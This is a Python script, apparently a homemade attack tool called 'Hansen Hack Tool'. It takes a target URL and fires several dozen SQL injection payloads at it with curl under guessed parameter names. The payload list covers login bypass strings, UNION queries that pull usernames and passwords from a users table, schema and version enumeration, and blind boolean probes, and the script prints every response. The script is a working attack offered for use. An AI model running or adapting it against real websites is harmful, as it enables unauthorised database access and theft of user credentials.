Hansen Hack Tool

1. import subprocess
2. import shlex
3. from colorama import Fore, Style
4.  
5. class HansenHackTool:
6.     def __init__(self):
7.         self.target_url = input("Enter the target URL: ").strip()
8.         self.payloads = [
9.             "' OR '1'='1", "' OR '1'='1'--", "' OR '1'='1'/*", "' OR 1=1--", "' OR 1=1#", "' OR 1=1/*", "' OR 'a'='a", "' OR 'a'='a'--",
10.             "' OR 1=1--+", "' OR 1=1/*", "' OR ''='", "' OR '1'='1'--", "' UNION SELECT NULL, NULL, NULL--",
11.             "' UNION SELECT NULL, table_name, NULL FROM information_schema.tables--",
12.             "' UNION SELECT NULL, column_name, NULL FROM information_schema.columns WHERE table_name = 'users'--",
13.             "' UNION ALL SELECT NULL, username, password FROM users--",
14.             "' UNION ALL SELECT NULL, NULL, GROUP_CONCAT(table_name) FROM information_schema.tables--",
15.             "' UNION ALL SELECT NULL, NULL, GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='users'--",
16.             "' UNION SELECT NULL, NULL, CONCAT('Database: ', DATABASE())--",
17.             "' UNION SELECT NULL, NULL, CONCAT('Current User: ', USER())--",
18.             "' UNION SELECT NULL, NULL, CONCAT('Current Database: ', DATABASE())--",
19.             "' UNION SELECT NULL, NULL, CONCAT('Version: ', @@version)--",
20.             "' UNION SELECT NULL, NULL, CONCAT('User Host: ', USER())--",
21.             "' UNION SELECT NULL, NULL, CONCAT('Table Count: ', (SELECT COUNT(*) FROM information_schema.tables))--",
22.             "' AND 1=CONVERT(int, (SELECT @@version))--",
23.             "' AND 1=2 UNION SELECT NULL, @@version--",
24.             "' AND 1=CAST((SELECT @@version) AS INT)--",
25.             "' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)--",
26.             "' AND (SELECT 1 FROM DUAL WHERE 1=1)--",
27.             "' AND (SELECT IF(1=1, 1, 0))--",
28.             "' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)--",
29.             "' AND (SELECT CASE WHEN (1=2) THEN 1 ELSE 0 END)--",
30.             "' AND (SELECT IFNULL((SELECT user()), 'null'))--",
31.             "' OR 1=1; INSERT INTO logs (message) VALUES ('SQL Injection Detected')--",
32.             "' OR EXISTS (SELECT * FROM users WHERE username = 'admin')--",
33.             "' OR (SELECT COUNT(*) FROM users WHERE username = 'admin') > 0--",
34.             "' OR (SELECT LENGTH(password) FROM users WHERE username = 'admin') = 8--",
35.             "' OR (SELECT 1 FROM users WHERE username = 'admin' AND password = 'password')--",
36.             "' OR (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END FROM dual)--",
37.             "' AND (SELECT COUNT(*) FROM users WHERE username = 'admin') > 0--",
38.             "' AND (SELECT LENGTH(password) FROM users WHERE username = 'admin') = 8--",
39.             "' AND (SELECT EXISTS (SELECT * FROM users WHERE username = 'admin'))--",
40.             "' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)--",
41.             "' AND (SELECT CASE WHEN (1=2) THEN 1 ELSE 0 END)--",
42.             "' AND (SELECT IFNULL((SELECT user()), 'null'))--",
43.             "' AND (SELECT IFNULL((SELECT COUNT(*) FROM information_schema.tables), 'null'))--",
44.             "' AND (SELECT IFNULL((SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users'), 'null'))--"
45.         ]
46.  
47.     def _print_title(self):
48.         print(f"{Fore.RED}{Style.BRIGHT}=== HANSEN HACK TOOL ==={Style.RESET_ALL}")
49.  
50.     def _print_message(self, message):
51.         print(f"{Fore.BLUE}{message}{Style.RESET_ALL}")
52.  
53.     def _print_separator(self):
54.         print("-" * 50)
55.  
56.     def _run_curl_command(self, payload, scan_type):
57.         escaped_payload = shlex.quote(payload)
58.         url_with_payload = f"{self.target_url}?{scan_type}={escaped_payload}"
59.         command = ["curl", "-s", "-X", "GET", url_with_payload]
60.         try:
61.             result = subprocess.run(command, check=True, text=True, capture_output=True)
62.             return result.stdout
63.         except subprocess.CalledProcessError as e:
64.             return f"Error: {e.stderr.strip()}"
65.  
66.     def _run_all_scans(self):
67.         self._print_title()
68.         for payload in self.payloads:
69.             for scan_type in ["file_path", "parameter", "command", "directory", "payload"]:
70.                 output = self._run_curl_command(payload, scan_type)
71.                 self._print_separator()
72.                 self._print_message(f"Scan Type: {scan_type} | Payload: {payload}")
73.                 self._print_message(f"Output:\n{output}")
74.  
75.     def _prompt_user_choice(self):
76.         self._print_message("Please select an option:")
77.         self._print_message("1. Run all scans")
78.         self._print_message("2. Exit")
79.         return input("Enter your choice: ")
80.  
81.     def run(self):
82.         self._print_title()
83.         choice = self._prompt_user_choice()
84.         if choice == '1':
85.             self._run_all_scans()
86.         elif choice == '2':
87.             self._print_message("Exiting tool.")
88.         else:
89.             self._print_message("Invalid choice. Please select a valid option.")
90.             self.run()
91.  
92. if __name__ == "__main__":
93.     tool = HansenHackTool()
94.     tool.run()